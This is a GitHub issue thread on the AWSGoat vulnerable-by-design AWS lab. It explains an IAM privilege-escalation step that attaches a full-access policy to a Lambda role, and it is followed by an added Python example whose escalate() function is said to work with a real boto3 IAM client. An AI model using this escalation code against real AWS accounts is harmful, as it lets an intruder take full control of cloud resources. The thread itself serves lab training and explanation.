ine-labs / AWSGoat

AWSGoat : A Damn Vulnerable AWS Infrastructure
MIT License

Misconfigured dev-ec2-lambda-policies #39

Closed aj2rivastava closed 10 months ago

aj2rivastava commented 1 year ago

While performing the AWS Goat Lab, I realized that the initial access provided the AWS session for the blog-application-data role. But when I tried to perform the privilege escalation, I realized that dev-ec2-lambda-policies is misconfigured to allow AttachRolePolicy on the blog_app_lambda role instead of the blog-application-data role. Is this expected, or am I missing something?

s0ulix commented 10 months ago

Hey @aj2rivastava, initial access is provided from the blog-application-data function's AWS credentials. This function assumes the blog_app_lambda_data role. Then, in the privilege escalation step, we use dev-ec2-lambda-policies, which has permission over the role blog_app_lambda_data to attach a policy to it, not the blog_app_lambda role. Here we create a new policy that allows full access on all resources and attach it to the blog_app_lambda_data role, which is assumed by the blog-application-data function. So when we use the new credentials from the blog-application-data function, we will have full access.

We have tried it on our end and it works as expected. You can follow the steps from the solution manuals to get the privilege escalation.
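The escalation path described in the reply above, as an added example that is not AWSGoat's code and not code posted by either commenter. It uses an offline stand-in for boto3's IAM client that exposes the same `create_policy` / `attach_role_policy` keyword arguments, so the same `escalate` call would work with a real `boto3.client("iam")` built from the blog-application-data function's credentials. The contents of dev-ec2-lambda-policies (which actions it grants and on which ARNs), the account ID and the policy name are assumptions made for the example; the real policy document in AWSGoat may differ. The `attachable_roles` check is the point of the thread: the assumed policy scopes iam:AttachRolePolicy to blog_app_lambda_data, so blog_app_lambda is out of reach.

```python
# Added example, not code from AWSGoat or from the issue thread.
# Models the escalation step with an offline stand-in for boto3's IAM client;
# the policy document, account ID and policy name below are assumptions.
import fnmatch
import json

ACCOUNT_ID = "123456789012"           # constructed placeholder, not a real account
TARGET_ROLE = "blog_app_lambda_data"  # role assumed by the blog-application-data function


def role_arn(name: str) -> str:
    return f"arn:aws:iam::{ACCOUNT_ID}:role/{name}"


# ASSUMED shape of dev-ec2-lambda-policies: the thread only says it can attach a
# policy to blog_app_lambda_data; the real document in AWSGoat may differ.
DEV_EC2_LAMBDA_POLICIES = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["iam:CreatePolicy", "iam:AttachRolePolicy"],
        "Resource": [role_arn(TARGET_ROLE), f"arn:aws:iam::{ACCOUNT_ID}:policy/*"],
    }],
}

# The policy the escalation step creates: full access on every resource.
FULL_ACCESS_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}


def _matches(patterns, value: str, case_sensitive: bool) -> bool:
    """Wildcard match of one value against a string or list of IAM patterns."""
    if isinstance(patterns, str):
        patterns = [patterns]
    if not case_sensitive:  # IAM action names are case-insensitive, ARNs are not
        value = value.lower()
        patterns = [p.lower() for p in patterns]
    return any(fnmatch.fnmatchcase(value, p) for p in patterns)


def is_allowed(policy: dict, action: str, resource: str) -> bool:
    """Minimal IAM evaluator: an explicit Deny wins, otherwise any matching Allow.
    Ignores Condition, Principal, NotAction and NotResource."""
    allowed = False
    for stmt in policy["Statement"]:
        if (_matches(stmt["Action"], action, case_sensitive=False)
                and _matches(stmt["Resource"], resource, case_sensitive=True)):
            if stmt["Effect"] == "Deny":
                return False
            allowed = True
    return allowed


def attachable_roles(policy: dict, candidates) -> list:
    """Which of the candidate roles can the holder of this policy attach policies to?"""
    return [r for r in candidates if is_allowed(policy, "iam:AttachRolePolicy", role_arn(r))]


class FakeIAM:
    """Offline stand-in for boto3.client('iam'): same method names and keyword
    arguments as create_policy / attach_role_policy, but each call is authorised
    against the caller's policy document instead of by AWS."""

    def __init__(self, caller_policy: dict):
        self.caller_policy = caller_policy
        self.policies = {}   # policy ARN -> parsed document
        self.attached = {}   # role name -> [policy ARNs]

    def create_policy(self, PolicyName: str, PolicyDocument: str) -> dict:
        arn = f"arn:aws:iam::{ACCOUNT_ID}:policy/{PolicyName}"
        if not is_allowed(self.caller_policy, "iam:CreatePolicy", arn):
            raise PermissionError(f"AccessDenied: iam:CreatePolicy on {arn}")
        self.policies[arn] = json.loads(PolicyDocument)
        return {"Policy": {"Arn": arn}}

    def attach_role_policy(self, RoleName: str, PolicyArn: str) -> dict:
        target = role_arn(RoleName)
        if not is_allowed(self.caller_policy, "iam:AttachRolePolicy", target):
            raise PermissionError(f"AccessDenied: iam:AttachRolePolicy on {target}")
        self.attached.setdefault(RoleName, []).append(PolicyArn)
        return {}


def escalate(iam, role_name: str, policy_name: str = "escalation-policy") -> str:
    """The step from the thread: create a full-access policy and attach it to the
    role the compromised function assumes. Returns the new policy's ARN."""
    doc = json.dumps(FULL_ACCESS_POLICY)
    arn = iam.create_policy(PolicyName=policy_name, PolicyDocument=doc)["Policy"]["Arn"]
    iam.attach_role_policy(RoleName=role_name, PolicyArn=arn)
    return arn


if __name__ == "__main__":
    print("attachable:", attachable_roles(DEV_EC2_LAMBDA_POLICIES, ["blog_app_lambda", TARGET_ROLE]))
    iam = FakeIAM(DEV_EC2_LAMBDA_POLICIES)
    print("attached", escalate(iam, TARGET_ROLE), "to", TARGET_ROLE)
    try:
        escalate(iam, "blog_app_lambda")
    except PermissionError as err:
        print("other role is out of scope:", err)
```

After the real `attach_role_policy` succeeds, the credentials already held by the function do not gain anything; as the reply says, new credentials have to be obtained from the blog-application-data function so that the role is assumed again with the new policy attached.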